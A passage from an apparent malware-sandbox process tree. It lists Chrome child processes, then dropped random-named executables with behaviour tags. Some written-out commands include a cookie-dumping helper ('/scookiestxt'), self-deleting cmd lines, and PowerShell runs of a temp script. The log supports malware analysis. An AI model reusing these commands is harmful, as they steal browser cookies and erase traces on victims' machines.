                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1488,1227292953631920901,13968922505568221438,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3840 /prefetch:8
                                                                                                8⤵
                                                                                                  PID:1876
                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1488,1227292953631920901,13968922505568221438,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3856 /prefetch:8
                                                                                                  8⤵
                                                                                                    PID:5540
                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1488,1227292953631920901,13968922505568221438,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5864 /prefetch:8
                                                                                                    8⤵
                                                                                                      PID:3596
                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1488,1227292953631920901,13968922505568221438,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7220 /prefetch:8
                                                                                                      8⤵
                                                                                                        PID:4888
                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1488,1227292953631920901,13968922505568221438,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7808 /prefetch:8
                                                                                                        8⤵
                                                                                                          PID:4740
                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1488,1227292953631920901,13968922505568221438,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7960 /prefetch:8
                                                                                                          8⤵
                                                                                                            PID:4232
                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1488,1227292953631920901,13968922505568221438,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7528 /prefetch:8
                                                                                                            8⤵
                                                                                                              PID:5580
                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1488,1227292953631920901,13968922505568221438,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7380 /prefetch:8
                                                                                                              8⤵
                                                                                                                PID:5808
                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1488,1227292953631920901,13968922505568221438,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7232 /prefetch:8
                                                                                                                8⤵
                                                                                                                  PID:5480
                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1488,1227292953631920901,13968922505568221438,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7104 /prefetch:8
                                                                                                                  8⤵
                                                                                                                    PID:4708
                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1488,1227292953631920901,13968922505568221438,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4956 /prefetch:8
                                                                                                                    8⤵
                                                                                                                      PID:4712
                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1488,1227292953631920901,13968922505568221438,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5596 /prefetch:8
                                                                                                                      8⤵
                                                                                                                        PID:5168
                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1488,1227292953631920901,13968922505568221438,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6200 /prefetch:8
                                                                                                                        8⤵
                                                                                                                          PID:4864
                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1488,1227292953631920901,13968922505568221438,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1640 /prefetch:8
                                                                                                                          8⤵
                                                                                                                            PID:968
                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1488,1227292953631920901,13968922505568221438,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3692 /prefetch:8
                                                                                                                            8⤵
                                                                                                                              PID:6120
                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1488,1227292953631920901,13968922505568221438,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3780 /prefetch:8
                                                                                                                              8⤵
                                                                                                                                PID:6080
                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1488,1227292953631920901,13968922505568221438,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5592 /prefetch:8
                                                                                                                                8⤵
                                                                                                                                  PID:3568
                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1488,1227292953631920901,13968922505568221438,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8004 /prefetch:8
                                                                                                                                  8⤵
                                                                                                                                    PID:4544
                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1488,1227292953631920901,13968922505568221438,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6280 /prefetch:8
                                                                                                                                    8⤵
                                                                                                                                      PID:5772
                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1488,1227292953631920901,13968922505568221438,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8320 /prefetch:8
                                                                                                                                      8⤵
                                                                                                                                        PID:2728
                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1488,1227292953631920901,13968922505568221438,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8576 /prefetch:8
                                                                                                                                        8⤵
                                                                                                                                          PID:5324
                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1488,1227292953631920901,13968922505568221438,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8836 /prefetch:8
                                                                                                                                          8⤵
                                                                                                                                            PID:4120
                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1488,1227292953631920901,13968922505568221438,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7536 /prefetch:8
                                                                                                                                            8⤵
                                                                                                                                              PID:5236
                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1488,1227292953631920901,13968922505568221438,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8448 /prefetch:8
                                                                                                                                              8⤵
                                                                                                                                                PID:5392
                                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1488,1227292953631920901,13968922505568221438,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7804 /prefetch:8
                                                                                                                                                8⤵
                                                                                                                                                  PID:3988
                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1488,1227292953631920901,13968922505568221438,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7384 /prefetch:8
                                                                                                                                                  8⤵
                                                                                                                                                    PID:6096
                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1488,1227292953631920901,13968922505568221438,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8324 /prefetch:8
                                                                                                                                                    8⤵
                                                                                                                                                      PID:5300
                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1488,1227292953631920901,13968922505568221438,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8944 /prefetch:8
                                                                                                                                                      8⤵
                                                                                                                                                        PID:5296
                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1488,1227292953631920901,13968922505568221438,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1436 /prefetch:8
                                                                                                                                                        8⤵
                                                                                                                                                          PID:4664
                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1488,1227292953631920901,13968922505568221438,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6920 /prefetch:8
                                                                                                                                                          8⤵
                                                                                                                                                            PID:3720
                                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1488,1227292953631920901,13968922505568221438,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6816 /prefetch:1
                                                                                                                                                            8⤵
                                                                                                                                                              PID:6052
                                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1488,1227292953631920901,13968922505568221438,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8532 /prefetch:1
                                                                                                                                                              8⤵
                                                                                                                                                                PID:2200
                                                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1488,1227292953631920901,13968922505568221438,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8320 /prefetch:1
                                                                                                                                                                8⤵
                                                                                                                                                                  PID:2204
                                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1488,1227292953631920901,13968922505568221438,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=8836 /prefetch:2
                                                                                                                                                                  8⤵
                                                                                                                                                                    PID:4172
                                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1488,1227292953631920901,13968922505568221438,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8328 /prefetch:8
                                                                                                                                                                    8⤵
                                                                                                                                                                      PID:5404
                                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1488,1227292953631920901,13968922505568221438,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=9080 /prefetch:8
                                                                                                                                                                      8⤵
                                                                                                                                                                        PID:4252
                                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1488,1227292953631920901,13968922505568221438,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3768 /prefetch:8
                                                                                                                                                                        8⤵
                                                                                                                                                                          PID:2372
                                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1488,1227292953631920901,13968922505568221438,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5260 /prefetch:8
                                                                                                                                                                          8⤵
                                                                                                                                                                            PID:4352
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\SwReporter\91.263.200\software_reporter_tool.exe
                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\SwReporter\91.263.200\software_reporter_tool.exe" --engine=2 --scan-locations=1,2,3,4,5,6,7,8,10 --disabled-locations=9,11 --session-id=jKCyvo2AbeqpT+z/KKtJTHCiE7wuXF3zpheKgoq9 --registry-suffix=ESET --srt-field-trial-group-name=NewCleanerUIExperiment
                                                                                                                                                                            8⤵
                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                            PID:656
                                                                                                                                                                            • \??\c:\users\admin\appdata\local\google\chrome\user data\swreporter\91.263.200\software_reporter_tool.exe
                                                                                                                                                                              "c:\users\admin\appdata\local\google\chrome\user data\swreporter\91.263.200\software_reporter_tool.exe" --crash-handler "--database=c:\users\admin\appdata\local\Google\Software Reporter Tool" --url=https://clients2.google.com/cr/report --annotation=plat=Win32 --annotation=prod=ChromeFoil --annotation=ver=91.263.200 --initial-client-data=0x244,0x248,0x24c,0x220,0x250,0x7ff764933270,0x7ff764933280,0x7ff764933290
                                                                                                                                                                              9⤵
                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                              PID:4804
                                                                                                                                                                            • \??\c:\users\admin\appdata\local\google\chrome\user data\swreporter\91.263.200\software_reporter_tool.exe
                                                                                                                                                                              "c:\users\admin\appdata\local\google\chrome\user data\swreporter\91.263.200\software_reporter_tool.exe" --use-crash-handler-with-id="\\.\pipe\crashpad_656_GJHTOFHYHHWXIVTG" --sandboxed-process-id=2 --init-done-notifier=692 --sandbox-mojo-pipe-token=17443197814782785403 --mojo-platform-channel-handle=668 --engine=2
                                                                                                                                                                              9⤵
                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                              PID:5552
                                                                                                                                                                            • \??\c:\users\admin\appdata\local\google\chrome\user data\swreporter\91.263.200\software_reporter_tool.exe
                                                                                                                                                                              "c:\users\admin\appdata\local\google\chrome\user data\swreporter\91.263.200\software_reporter_tool.exe" --use-crash-handler-with-id="\\.\pipe\crashpad_656_GJHTOFHYHHWXIVTG" --sandboxed-process-id=3 --init-done-notifier=912 --sandbox-mojo-pipe-token=7702543748075229501 --mojo-platform-channel-handle=908
                                                                                                                                                                              9⤵
                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                              PID:5240
                                                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1488,1227292953631920901,13968922505568221438,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7688 /prefetch:8
                                                                                                                                                                            8⤵
                                                                                                                                                                              PID:5068
                                                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1488,1227292953631920901,13968922505568221438,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7476 /prefetch:8
                                                                                                                                                                              8⤵
                                                                                                                                                                                PID:5928
                                                                                                                                                                          • C:\Users\Admin\Documents\yOeUkMJ1s15BSRdMDENV_gyH.exe
                                                                                                                                                                            "C:\Users\Admin\Documents\yOeUkMJ1s15BSRdMDENV_gyH.exe"
                                                                                                                                                                            6⤵
                                                                                                                                                                              PID:5096
                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{W8Ss-O1XNV-go7K-q66S9}\41895171839.exe"
                                                                                                                                                                                7⤵
                                                                                                                                                                                  PID:5148
                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\{W8Ss-O1XNV-go7K-q66S9}\41895171839.exe
                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\{W8Ss-O1XNV-go7K-q66S9}\41895171839.exe"
                                                                                                                                                                                    8⤵
                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                                                    PID:5380
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\{W8Ss-O1XNV-go7K-q66S9}\41895171839.exe
                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\{W8Ss-O1XNV-go7K-q66S9}\41895171839.exe"
                                                                                                                                                                                      9⤵
                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                      • Checks processor information in registry
                                                                                                                                                                                      PID:1468
                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\1624591326322.exe
                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\1624591326322.exe"
                                                                                                                                                                                        10⤵
                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                        PID:5948
                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{W8Ss-O1XNV-go7K-q66S9}\89085130515.exe" /mix
                                                                                                                                                                                  7⤵
                                                                                                                                                                                    PID:6136
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\{W8Ss-O1XNV-go7K-q66S9}\89085130515.exe
                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\{W8Ss-O1XNV-go7K-q66S9}\89085130515.exe" /mix
                                                                                                                                                                                      8⤵
                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                      • Checks processor information in registry
                                                                                                                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                      PID:5496
                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                        "C:\Windows\system32\cmd.exe" /c rd /s /q C:\Users\Admin\AppData\Local\Temp\YPkrPeBH & timeout 3 & del /f /q "C:\Users\Admin\AppData\Local\Temp\{W8Ss-O1XNV-go7K-q66S9}\89085130515.exe"
                                                                                                                                                                                        9⤵
                                                                                                                                                                                          PID:5804
                                                                                                                                                                                          • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                            timeout 3
                                                                                                                                                                                            10⤵
                                                                                                                                                                                            • Delays execution with timeout.exe
                                                                                                                                                                                            PID:5356
                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /c taskkill /im "yOeUkMJ1s15BSRdMDENV_gyH.exe" /f & erase "C:\Users\Admin\Documents\yOeUkMJ1s15BSRdMDENV_gyH.exe" & exit
                                                                                                                                                                                      7⤵
                                                                                                                                                                                        PID:5704
                                                                                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                          taskkill /im "yOeUkMJ1s15BSRdMDENV_gyH.exe" /f
                                                                                                                                                                                          8⤵
                                                                                                                                                                                          • Kills process with taskkill
                                                                                                                                                                                          PID:4612
                                                                                                                                                                                    • C:\Users\Admin\Documents\jqiy2qPYKsm_qN8BtXHczIun.exe
                                                                                                                                                                                      "C:\Users\Admin\Documents\jqiy2qPYKsm_qN8BtXHczIun.exe"
                                                                                                                                                                                      6⤵
                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                      PID:644
                                                                                                                                                                                      • C:\Users\Admin\Documents\jqiy2qPYKsm_qN8BtXHczIun.exe
                                                                                                                                                                                        "C:\Users\Admin\Documents\jqiy2qPYKsm_qN8BtXHczIun.exe"
                                                                                                                                                                                        7⤵
                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                        • Modifies data under HKEY_USERS
                                                                                                                                                                                        PID:4972
                                                                                                                                                                                    • C:\Users\Admin\Documents\AUyydxXTdcbu1hRSMdEJ8WVI.exe
                                                                                                                                                                                      "C:\Users\Admin\Documents\AUyydxXTdcbu1hRSMdEJ8WVI.exe"
                                                                                                                                                                                      6⤵
                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                      PID:2200
                                                                                                                                                                                      • C:\Users\Admin\Documents\AUyydxXTdcbu1hRSMdEJ8WVI.exe
                                                                                                                                                                                        "C:\Users\Admin\Documents\AUyydxXTdcbu1hRSMdEJ8WVI.exe"
                                                                                                                                                                                        7⤵
                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                        • Modifies data under HKEY_USERS
                                                                                                                                                                                        PID:1272
                                                                                                                                                                                    • C:\Users\Admin\Documents\1Bt958Dc5t_X5Z5PGldppAj3.exe
                                                                                                                                                                                      "C:\Users\Admin\Documents\1Bt958Dc5t_X5Z5PGldppAj3.exe"
                                                                                                                                                                                      6⤵
                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                      PID:2108
                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                        7⤵
                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                        PID:3380
                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                        7⤵
                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                        PID:4376
                                                                                                                                                                                    • C:\Users\Admin\Documents\NSHDKWw4Y9XTlpWiBcOnk8RQ.exe
                                                                                                                                                                                      "C:\Users\Admin\Documents\NSHDKWw4Y9XTlpWiBcOnk8RQ.exe"
                                                                                                                                                                                      6⤵
                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                                                                      PID:4480
                                                                                                                                                                                      • C:\Users\Admin\Documents\NSHDKWw4Y9XTlpWiBcOnk8RQ.exe
                                                                                                                                                                                        C:\Users\Admin\Documents\NSHDKWw4Y9XTlpWiBcOnk8RQ.exe
                                                                                                                                                                                        7⤵
                                                                                                                                                                                          PID:4488
                                                                                                                                                                                        • C:\Users\Admin\Documents\NSHDKWw4Y9XTlpWiBcOnk8RQ.exe
                                                                                                                                                                                          C:\Users\Admin\Documents\NSHDKWw4Y9XTlpWiBcOnk8RQ.exe
                                                                                                                                                                                          7⤵
                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                          PID:1168
                                                                                                                                                                                      • C:\Users\Admin\Documents\c5dZcgHfvbR6woVdl8kyJu0k.exe
                                                                                                                                                                                        "C:\Users\Admin\Documents\c5dZcgHfvbR6woVdl8kyJu0k.exe"
                                                                                                                                                                                        6⤵
                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                        • Checks BIOS information in registry
                                                                                                                                                                                        • Checks whether UAC is enabled
                                                                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                        PID:3256
                                                                                                                                                                                      • C:\Users\Admin\Documents\loVC3N1kwMDTgGVFVhaz06WH.exe
                                                                                                                                                                                        "C:\Users\Admin\Documents\loVC3N1kwMDTgGVFVhaz06WH.exe"
                                                                                                                                                                                        6⤵
                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                        • Drops file in Program Files directory
                                                                                                                                                                                        PID:1084
                                                                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsj72BD.tmp\tempfile.ps1"
                                                                                                                                                                                          7⤵
                                                                                                                                                                                            PID:1584
                                                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsj72BD.tmp\tempfile.ps1"
                                                                                                                                                                                            7⤵
                                                                                                                                                                                              PID:5924
                                                                                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsj72BD.tmp\tempfile.ps1"
                                                                                                                                                                                              7⤵
                                                                                                                                                                                                PID:5968
                                                                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsj72BD.tmp\tempfile.ps1"
                                                                                                                                                                                                7⤵
                                                                                                                                                                                                  PID:4232
                                                                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsj72BD.tmp\tempfile.ps1"
                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                    PID:5900
                                                                                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsj72BD.tmp\tempfile.ps1"
                                                                                                                                                                                                    7⤵
